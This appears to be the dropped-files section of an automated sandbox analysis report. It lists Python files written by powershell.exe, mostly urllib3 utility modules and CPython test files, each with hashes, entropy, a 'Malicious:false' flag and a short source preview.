                                                                                                                                                                                                              Preview:........Hl.e................................U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................r.d.d.l.m.Z...d.Z...e.g.d...........Z.d.Z.....d.d.l.Z.e.d.z...Z...d.d.l.Z.e.d.z...Z...G.d...d.e.........Z.e.j2..................Z.d.e.d.<...e.j8..................e.e.f.....Z.h.d...Z.............d...........................d.d...Z ............d.d...Z!d.d...Z"..G.d...d.e.jF..........................Z$................d.d...Z%y.#.e.$.r...d.d.l.Z.Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.#.e.$.r...Y...w.x.Y.w.)......)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc...........................e.Z.d.Z.d.Z.y.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token........hC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\urllib3/util/request.pyr....r....'...s..........Er....r....z.Final[_TYP
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4462
                                                                                                                                                                                                              Entropy (8bit):4.692718546912863
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Un30QyT1QdMw0PwwStdwcWTyFIPCjuRIi84omvLBoQ/nQo:Unfyi6c6omvp/Qo
                                                                                                                                                                                                              MD5:FF78F12FA8E94A83352B8A91747B4F70
                                                                                                                                                                                                              SHA1:44358AC93C2D0719E53344DB713B2C2F968DDFF4
                                                                                                                                                                                                              SHA-256:41E51412E3668739E9B8A34F2FE0742153A431D302BBCA095FAD8E0B4569CEE8
                                                                                                                                                                                                              SHA-512:84403F0FBFAA313152C721E20A7F4CB3BD0C613F7B43DB0EE48023D8F7FD2DFCF6C11BE6FF1C561A120A6B0B4A2D42B42C6BAB0E60C282A993BAFEDF399B897F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import socket.import typing..from ..exceptions import LocationParseError.from .timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT.._TYPE_SOCKET_OPTIONS = typing.Sequence[typing.Tuple[int, int, typing.Union[int, bytes]]]..if typing.TYPE_CHECKING:. from .._base_connection import BaseHTTPConnection...def is_connection_dropped(conn: BaseHTTPConnection) -> bool: # Platform-specific. """. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. """. return not conn.is_connected...# This function is copied from socket.py in the Python 2.7 standard.# library test suite. Added to its signature is only `socket_options`..# One additional modification is that we avoid binding to IPv6 servers.# discovered in DNS if the system doesn't have IPv6 functionality..def create_connection(. address: tuple[str, int],. timeout: _TYPE_TIMEOUT = _DEFAULT_TIMEOUT,. source_address:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1148
                                                                                                                                                                                                              Entropy (8bit):4.568988072838994
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1R7i0ekLILn8+WQXvAFnT8adOeeleCfdO2MG89dYTysSd2o:PIgILn8+W38awee8CfdO2MG89dWysSdF
                                                                                                                                                                                                              MD5:9BD4BCA24A0FA10D896D386B7D736697
                                                                                                                                                                                                              SHA1:A10A3A580A9FEF94AF52CF37E00A9913E0F64DA0
                                                                                                                                                                                                              SHA-256:B1E3FCF90E41E9B07474CB703E3F98719650DF4BC7B8BA91BBEB48D096767F3B
                                                                                                                                                                                                              SHA-512:FECEE94612F30C3A5DEA846F6245BD4B5C717F9E65D6450C26DCD22B9DBF2CDD8B00C60FBA5143BC986A5CAEED22A4B64FA6CEDA5369CCF71A72861E9553E7C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import typing..from .url import Url..if typing.TYPE_CHECKING:. from ..connection import ProxyConfig...def connection_requires_http_tunnel(. proxy_url: Url | None = None,. proxy_config: ProxyConfig | None = None,. destination_scheme: str | None = None,.) -> bool:. """. Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). """. # If we're not using a proxy, no way to use a tunnel.. if proxy_url is None:. return False.. # HTTP destinations never require tunneling, we always forward.. if destination_scheme == "http":. return False.. # Support for forwarding with HTTPS proxies and HTTPS destinations.. if (. proxy_url.scheme == "https". a
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8102
                                                                                                                                                                                                              Entropy (8bit):4.751549009780488
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:R9yg6hKFsmz/Q2P7fTqSzblmEvxcUA7W/EE6aLHMCtkEyDe0KzaV79KW:O/hKZz/P7bq6pmEXAiH5bqp5
                                                                                                                                                                                                              MD5:F9DE7920C87B2AD1FDF30B41829896E1
                                                                                                                                                                                                              SHA1:E734EC1C4AB2FDFF487C091F2948382540F8BB60
                                                                                                                                                                                                              SHA-256:3D09C198A507310D21410E35BA16CB340780DB891EEB49BACDE8B07F0A1CA46A
                                                                                                                                                                                                              SHA-512:F82BFBFB9A58059509CE5D495571FDDC9336A7290C97A1F62D68B524202AEBDC8D6587F105C72B0B7E08757C7EBE909EB1D044D0438A94EB8CCE96937D7D5B58
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import io.import typing.from base64 import b64encode.from enum import Enum..from ..exceptions import UnrewindableBodyError.from .util import to_bytes..if typing.TYPE_CHECKING:. from typing import Final..# Pass as a value within ``headers`` to skip.# emitting some HTTP headers that are added automatically..# The only headers that are supported are ``Accept-Encoding``,.# ``Host``, and ``User-Agent``..SKIP_HEADER = "@@@SKIP_HEADER@@@".SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"])..ACCEPT_ENCODING = "gzip,deflate".try:. try:. import brotlicffi as _unused_module_brotli # type: ignore[import-not-found] # noqa: F401. except ImportError:. import brotli as _unused_module_brotli # type: ignore[import-not-found] # noqa: F401.except ImportError:. pass.else:. ACCEPT_ENCODING += ",br".try:. import zstandard as _unused_module_zstd # type: ignore[import-not-found] # noqa: F401.except ImportError:. pass
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3374
                                                                                                                                                                                                              Entropy (8bit):4.616514316314554
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Pn2y1uZsY0Gb9PpvNY4zamL7gkLgUCj0ZDkB7ST0FFaAHt5JhKCUAR6Px6nZwHec:+CuF0sPpvz+b5w8Ff/JOC6PIHc
                                                                                                                                                                                                              MD5:B4AB7140164239E3CAA07E0D2672326F
                                                                                                                                                                                                              SHA1:F296CB85D9DF58E5F40F560C9DAE60DB5AF70961
                                                                                                                                                                                                              SHA-256:BD013ADFDBA81218F5BE98C4771BB994D22124249466477BA6A965508D0164E0
                                                                                                                                                                                                              SHA-512:4750FADBD852F723AF3A01006EF1A87B0F4D53264E2077F05DF1D99CBC965D6EBFAC0028BBB18916A4A4931E72DCAAB6A066762055996AD8CBE36EBF0DDA0D08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import http.client as httplib.from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect..from ..exceptions import HeaderParsingError...def is_fp_closed(obj: object) -> bool:. """. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. """.. try:. # Check `isclosed()` first, in case Python3 doesn't set `closed`.. # GH Issue #928. return obj.isclosed() # type: ignore[no-any-return, attr-defined]. except AttributeError:. pass.. try:. # Check via the official file-like-object way.. return obj.closed # type: ignore[no-any-return, attr-defined]. except AttributeError:. pass.. try:. # Check if the object is a container for another file-like object that. # gets released on exhaustion (e.g. HTTPResponse).. return obj.fp is None # type: ignore[attr-defined]. except AttributeError:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18384
                                                                                                                                                                                                              Entropy (8bit):4.429138038057794
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WyMf12FuuccXjtRLJIkyMT9hZP0POAFuMqaWXef2Z0t5CpPu2wDsWrdLOGdUhoR8:WWsuPVnFXK5CkOaUT
                                                                                                                                                                                                              MD5:E75444D5DB257B3F031B24809AF03AF4
                                                                                                                                                                                                              SHA1:6CB66C4D490E3D9C3A84A6A0BDC66C9250791E35
                                                                                                                                                                                                              SHA-256:581FBBC759BB7D01FFF90AADAE4D8E1AFCFDDC6BC14F173EA519FC55FDE9E268
                                                                                                                                                                                                              SHA-512:D079DAEFA07CA654A085AE16774B6708C4DD06DB2445B9C1A9E53B062A4D44809C71488B984DC6A33D2209F8C0F3E425CFF1C753EB3E54890D0689918AD9BB52
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import email.import logging.import random.import re.import time.import typing.from itertools import takewhile.from types import TracebackType..from ..exceptions import (. ConnectTimeoutError,. InvalidHeader,. MaxRetryError,. ProtocolError,. ProxyError,. ReadTimeoutError,. ResponseError,.).from .util import reraise..if typing.TYPE_CHECKING:. from ..connectionpool import ConnectionPool. from ..response import BaseHTTPResponse..log = logging.getLogger(__name__)...# Data structure for representing the metadata of requests that result in a retry..class RequestHistory(typing.NamedTuple):. method: str | None. url: str | None. error: Exception | None. status: int | None. redirect_location: str | None...class Retry:. """Retry configuration... Each retry attempt will create a new Retry object with updated values, so. they can be safely reused... Retries can be defined as a default for a pool:.. .. code-b
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19109
                                                                                                                                                                                                              Entropy (8bit):4.876906285153513
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FevP+N8GFe6jhrpukwn242k1xnaLaQ7pfpyA7y+MwobXQ7pfpyA7y+MwobtymDIW:FeIqnZ1xwpfpyA7y+MwoTqpfpyA7y+MT
                                                                                                                                                                                                              MD5:219123419963D49AA06BD2B8422F0D3B
                                                                                                                                                                                                              SHA1:E1936017D6631073F17CD7551D5FF58DD524900F
                                                                                                                                                                                                              SHA-256:15ECA6752EBC46080444EC0C07D54B192A8B1EADA14542A721B402FDB0A91892
                                                                                                                                                                                                              SHA-512:AB3BB274279BEC2874660DFE4487E14D1F547264970DECD9107F43EB0E0934F1B18983452E586CF6EEA6DBFC12D5D1E1F08A2B7988734FE54B3953AED300108E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import hmac.import os.import socket.import sys.import typing.import warnings.from binascii import unhexlify.from hashlib import md5, sha1, sha256..from ..exceptions import ProxySchemeUnsupported, SSLError.from .url import _BRACELESS_IPV6_ADDRZ_RE, _IPV4_RE..SSLContext = None.SSLTransport = None.HAS_NEVER_CHECK_COMMON_NAME = False.IS_PYOPENSSL = False.ALPN_PROTOCOLS = ["http/1.1"].._TYPE_VERSION_INFO = typing.Tuple[int, int, int, str, int]..# Maps the length of a digest to a possible hash function producing this digest.HASHFUNC_MAP = {32: md5, 40: sha1, 64: sha256}...def _is_bpo_43522_fixed(. implementation_name: str,. version_info: _TYPE_VERSION_INFO,. pypy_version_info: _TYPE_VERSION_INFO | None,.) -> bool:. """Return True for CPython 3.8.9+, 3.9.3+ or 3.10+ and PyPy 7.3.8+ where. setting SSLContext.hostname_checks_common_name to False works... Outside of CPython and PyPy we don't know which implementations work. or not so we co
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5812
                                                                                                                                                                                                              Entropy (8bit):4.693270482744315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qnswp1bMzfocVZn0QkWlQ2VrzjthGH5t+6Q5JZolPVJIpdmfNtSupXeqdWL:uR/bmXB0QkWqitUHFgZMIPmVgu4r
                                                                                                                                                                                                              MD5:AA846D5E039C6A30B7F7C3B684CAE3E7
                                                                                                                                                                                                              SHA1:9BD94E0DDD8ABF77F0A719D11A00836978C8F5B8
                                                                                                                                                                                                              SHA-256:81A5AA8B1A18B50FC628EF1F7111858F755778CA2ACB1410B944CF8167A22FF3
                                                                                                                                                                                                              SHA-512:DE8ACBBC98797D455A47C6F136F6415F36846F6CD8F09591407690BD673566DC483447FFE8DD125D6AD99A7B3C0137F3A3C31406E665597B0C86A04436F84408
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""The match_hostname() function from Python 3.5, essential when using SSL."""..# Note: This file is under the PSF license as the code comes from the python.# stdlib. http://docs.python.org/3/license.html.# It is modified to remove commonName support...from __future__ import annotations..import ipaddress.import re.import typing.from ipaddress import IPv4Address, IPv6Address..if typing.TYPE_CHECKING:. from .ssl_ import _TYPE_PEER_CERT_RET_DICT..__version__ = "3.5.0.1"...class CertificateError(ValueError):. pass...def _dnsname_match(. dn: typing.Any, hostname: str, max_wildcards: int = 1.) -> typing.Match[str] | None | bool:. """Matching according to RFC 6125, section 6.4.3.. http://tools.ietf.org/html/rfc6125#section-6.4.3. """. pats = []. if not dn:. return False.. # Ported from python3-syntax:. # leftmost, *remainder = dn.split(r'.'). parts = dn.split(r"."). leftmost = parts[0]. remainder = parts[1:].. wildcards = leftmost.count("*").
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9034
                                                                                                                                                                                                              Entropy (8bit):4.5226963729997784
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:hwrcuD3X8SVqqJo6g3Nu0a76pyPs3xYyIjjhad:h2lD3vVV6kPswXY
                                                                                                                                                                                                              MD5:99D1FBBD0A7E1940BE216BBAA4FBCE54
                                                                                                                                                                                                              SHA1:CBCD8BC6797E6A24831879D1FA2E7E59D043E2FA
                                                                                                                                                                                                              SHA-256:485FFF2505D57070509E2149669DCFF6AF94787337D74595C1C070A93F5D08B1
                                                                                                                                                                                                              SHA-512:69FD3B904BCEAAA355BAF32A6A464FB6F3C97180C2576165E5EB222AEC16A1D3AF3B100BCD4B32684B5FB8422861984D0F57CBEFEF1866A6A288A34E8CEC9268
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import io.import socket.import ssl.import typing..from ..exceptions import ProxySchemeUnsupported..if typing.TYPE_CHECKING:. from typing import Literal.. from .ssl_ import _TYPE_PEER_CERT_RET, _TYPE_PEER_CERT_RET_DICT..._SelfT = typing.TypeVar("_SelfT", bound="SSLTransport")._WriteBuffer = typing.Union[bytearray, memoryview]._ReturnValue = typing.TypeVar("_ReturnValue")..SSL_BLOCKSIZE = 16384...class SSLTransport:. """. The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. implement TLS within TLS... The class supports most of the socket API operations.. """.. @staticmethod. def _validate_ssl_context_for_tls_in_tls(ssl_context: ssl.SSLContext) -> None:. """. Raises a ProxySchemeUnsupported if the provided ssl_context can't be used.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10346
                                                                                                                                                                                                              Entropy (8bit):4.487203103410679
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:FLWn+l/uQiHf8WSBXAG5yq3QnqXkHhsy6+:xWQ/uQA0MkGmCc+
                                                                                                                                                                                                              MD5:F4A48CE35A9B5729FEEA01D44490FCCF
                                                                                                                                                                                                              SHA1:166C5F455B7F05AD8D63687B29A0BF0724EBB2D5
                                                                                                                                                                                                              SHA-256:E1E4F5155799654EE1EE6603D49AB639735EE1FC5E91D36F868594919BAC4690
                                                                                                                                                                                                              SHA-512:669DA13231076509EC6F7005F55A91FC1364EDA287185842B738F0360088C7624EDA43C7151FD1CA1504CCD0D324FC54302BD4FCFC590027BA6264763F06485C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import time.import typing.from enum import Enum.from socket import getdefaulttimeout..from ..exceptions import TimeoutStateError..if typing.TYPE_CHECKING:. from typing import Final...class _TYPE_DEFAULT(Enum):. # This value should never be passed to socket.settimeout() so for safety we use a -1.. # socket.settimout() raises a ValueError for negative values.. token = -1..._DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token.._TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]]...class Timeout:. """Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout).. resp = http.request("GET", "https://example.com/").. print(resp.status).. Or per-request (which overrides the default for the pool):.. .. code-block:: python
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15213
                                                                                                                                                                                                              Entropy (8bit):4.872083630674659
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:cJKD+3h7DAmC+kN5t7+RsFkz6zY6cHZy12x:cJxDXC+kflVkOzY6cHIK
                                                                                                                                                                                                              MD5:811AF7DB53FFD4120CE4D151FAFA1F24
                                                                                                                                                                                                              SHA1:4CA2FFF416F7893D662E257A6E1E7090524545AC
                                                                                                                                                                                                              SHA-256:C07391869F344405F24E5008913A8B1734AB914EC9DF8643C57FAD37AE4C0599
                                                                                                                                                                                                              SHA-512:3EA9FA41032E093F417A75420A6D94212E226999F4FEEC0C26DDC6D8845F43CD8FC4300610E62DF37A087CE3BE10CBEDB41B0EBA17C6685CA8D8E5F46CB504B2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import re.import typing..from ..exceptions import LocationParseError.from .util import to_str..# We only want to normalize urls with an HTTP(S) scheme..# urllib3 infers URLs without a scheme (None) to be http.._NORMALIZABLE_SCHEMES = ("http", "https", None)..# Almost all of these patterns were derived from the.# 'rfc3986' module: https://github.com/python-hyper/rfc3986._PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}")._SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)")._URI_RE = re.compile(. r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?". r"(?://([^\\/?#]*))?". r"([^?#]*)". r"(?:\?([^#]*))?". r"(?:#(.*))?$",. re.UNICODE | re.DOTALL,.).._IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"._HEX_PAT = "[0-9A-Fa-f]{1,4}"._LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=_HEX_PAT, ipv4=_IPV4_PAT)._subs = {"hex": _HEX_PAT, "ls32": _LS32_PAT}._variations = [. # 6( h16 ":" ) ls32. "(?:%(hex)s:){6}%(ls32)s",. #
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1146
                                                                                                                                                                                                              Entropy (8bit):4.443278207032918
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1R7Hhv+sQK995Vb624+Q3+shD9bVb62A+QUH3jtIB2qBoEcZwtj4ri:PUsVnDexdOshDHeVdw2BR42
                                                                                                                                                                                                              MD5:3C5DC84F86959542DF8F2D38FDCD9366
                                                                                                                                                                                                              SHA1:AC7A579CE7E37CE8BF215F97B9BFB80B149B0F68
                                                                                                                                                                                                              SHA-256:8F795B64AD633F28B00F7E13F08809CDD5846554FEE04FB4BD82098BD52378D0
                                                                                                                                                                                                              SHA-512:A67CDF2BB9B97217A8E99EDA0089961A5B4EA6BDD5BCB0BA490469FFFF422430373D61B2E9FF3E5B54CE23C5361C07EBD9B845003D35DC7FDCF3DCCA7A826A07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import typing.from types import TracebackType...def to_bytes(. x: str | bytes, encoding: str | None = None, errors: str | None = None.) -> bytes:. if isinstance(x, bytes):. return x. elif not isinstance(x, str):. raise TypeError(f"not expecting type {type(x).__name__}"). if encoding or errors:. return x.encode(encoding or "utf-8", errors=errors or "strict"). return x.encode()...def to_str(. x: str | bytes, encoding: str | None = None, errors: str | None = None.) -> str:. if isinstance(x, str):. return x. elif not isinstance(x, bytes):. raise TypeError(f"not expecting type {type(x).__name__}"). if encoding or errors:. return x.decode(encoding or "utf-8", errors=errors or "strict"). return x.decode()...def reraise(. tp: type[BaseException] | None,. value: BaseException,. tb: TracebackType | None = None,.) -> typing.NoReturn:. try:. if value.__traceback__ is not t
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4423
                                                                                                                                                                                                              Entropy (8bit):4.57958390877449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6e0jQGAov2Rq9rFKYuBArDFL2c8WR9tg6L2LcJqKdDLfsWG1JAEg01AEDn:30jQGf9hKorDp2c86AW2LcJqyfsWgBD
                                                                                                                                                                                                              MD5:D333C4CDB4CF3074C1245164C65AAC59
                                                                                                                                                                                                              SHA1:B8FFB5126AB052A8798F03EFB7BC3D8C1BD6837A
                                                                                                                                                                                                              SHA-256:FE987C22B511DECA8FAA2D0EA29420254947E30CE419E3390A2C80ED7186B662
                                                                                                                                                                                                              SHA-512:A30CF0681A11CCB899D2FDD3CF355482DD8D3F51F2EFA4AE88C0A4B65C6E1A53FBB734F7BAE2DC51E85B5BE4AA767237EA14596FDECF66A715D51563B908AC5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations..import select.import socket.from functools import partial..__all__ = ["wait_for_read", "wait_for_write"]...# How should we wait on sockets?.#.# There are two types of APIs you can use for waiting on sockets: the fancy.# modern stateful APIs like epoll/kqueue, and the older stateless APIs like.# select/poll. The stateful APIs are more efficient when you have a lots of.# sockets to keep track of, because you can set them up once and then use them.# lots of times. But we only ever want to wait on a single socket at a time.# and don't want to keep track of state, so the stateless APIs are actually.# more efficient. So we want to use select() or poll()..#.# Now, how do we choose between select() and poll()? On traditional Unixes,.# select() has a strange calling convention that makes it slow, or fail.# altogether, for high-numbered file descriptors. The point of poll() is to fix.# that, so on Unixes, we prefer poll()..#.# On Windows, there is no poll() (o
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5304
                                                                                                                                                                                                              Entropy (8bit):4.264978953234674
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FWr/4JR1kZr3KOBFYx/aLdQu2Hl/NvptORKEhFA:e/z3BBKxedQRHl/NvnRcA
                                                                                                                                                                                                              MD5:B35A5FADD329D3C33DF2F0424EDE0603
                                                                                                                                                                                                              SHA1:08B4D57351D664D70C3CCB37BF526F8478E45B0A
                                                                                                                                                                                                              SHA-256:FF77ADEAB8C488B8F7970A2DBBBC2C3EBFD3758B6C75E0E7C699866A66B020CA
                                                                                                                                                                                                              SHA-512:8F3FB59FCC7D59B80F50A4839E268736A462FF226274D6572E2829C691D409019D35AB24B7C9CDC35DD7108E6C004EF117A42F0D945C45434BEE1600CBE747F8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import support..from test.support import warnings_helper..import os..import sys..import types....try:.. import _multiprocessing..except ModuleNotFoundError:.. _multiprocessing = None......if support.check_sanitizer(address=True, memory=True):.. # bpo-46633: test___all__ is skipped because importing some modules.. # directly can trigger known problems with ASAN (like tk or crypt)... raise unittest.SkipTest("workaround ASAN build issues on loading tests ".. "like tk or crypt")......class NoAll(RuntimeError):.. pass....class FailedImport(RuntimeError):.. pass......class AllTest(unittest.TestCase):.... def setUp(self):.. # concurrent.futures uses a __getattr__ hook. Its __all__ triggers.. # import of a submodule, which fails when _multiprocessing is not.. # available... if _multiprocessing is None:.. sys.modules["_multiprocessing"] = types.ModuleType("_multiprocessing")....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8496
                                                                                                                                                                                                              Entropy (8bit):4.5565498033867815
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:lyJ0ZrJxbhhGyDeKjvkXMo/sB6h/9a/Y/1y:la01nb+aeEkIr
                                                                                                                                                                                                              MD5:965857B8C0A65587D0AB59EDB964E986
                                                                                                                                                                                                              SHA1:2FCEC9E3465D40BBCC2DC64257B3C9F282D6FA5E
                                                                                                                                                                                                              SHA-256:4B0B767A3A5DC2D85A7DD34A31681B37B5390DFD5E7EBA0C2ADB9ECC5CE2A57E
                                                                                                                                                                                                              SHA-512:30AEA5FE5C9F3A0D90368F21C09113D8F1B1C0DD19D5C19A1E41EF9B4A8D821B649A3700F027AE97689F14B67D81315A57B3F9474782AE744DE792ADB99645A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from _locale import (setlocale, LC_ALL, LC_CTYPE, LC_NUMERIC, localeconv, Error)..try:.. from _locale import (RADIXCHAR, THOUSEP, nl_langinfo)..except ImportError:.. nl_langinfo = None....import locale..import sys..import unittest..from platform import uname....from test import support....if uname().system == "Darwin":.. maj, min, mic = [int(part) for part in uname().release.split(".")].. if (maj, min, mic) < (8, 0, 0):.. raise unittest.SkipTest("locale support broken for OS X < 10.4")....candidate_locales = ['es_UY', 'fr_FR', 'fi_FI', 'es_CO', 'pt_PT', 'it_IT',.. 'et_EE', 'es_PY', 'no_NO', 'nl_NL', 'lv_LV', 'el_GR', 'be_BY', 'fr_BE',.. 'ro_RO', 'ru_UA', 'ru_RU', 'es_VE', 'ca_ES', 'se_NO', 'es_EC', 'id_ID',.. 'ka_GE', 'es_CL', 'wa_BE', 'hu_HU', 'lt_LT', 'sl_SI', 'hr_HR', 'es_AR',.. 'es_ES', 'oc_FR', 'gl_ES', 'bg_BG', 'is_IS', 'mk_MK', 'de_AT', 'pt_BR',.. 'da_DK', 'nn_NO', 'cs_CZ', 'de_LU', 'es_BO', 'sq_AL', 'sk_SK', 'fr_CH',.. 'de_DE', 'sr_YU', 'br_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4338
                                                                                                                                                                                                              Entropy (8bit):4.603985940175592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:7rGlcasm1gZ3JiNhgA0dTZOAJiLwCWqNjysBDpXA:36ct4YOjLRfN1XA
                                                                                                                                                                                                              MD5:41DB70A11C40C9F998E3B9376B464190
                                                                                                                                                                                                              SHA1:38B6473029C0EC14F8AE038CEE874BC509BF610C
                                                                                                                                                                                                              SHA-256:AA8CF1DC3D6839E75BE04FB220625520E8F8DE36AA013F240E6DA65DE3F00A94
                                                                                                                                                                                                              SHA-512:C3B764E718915D307F4822590EAF90FEB9ABBD7EF30B2686D66BA840DD5F022569FC4D058ABA7F0A81698C8931195F0FAD6C1919E806DA8E3EE7B410B2E8317D
                                                                                                                                                                                                              Malicious:false
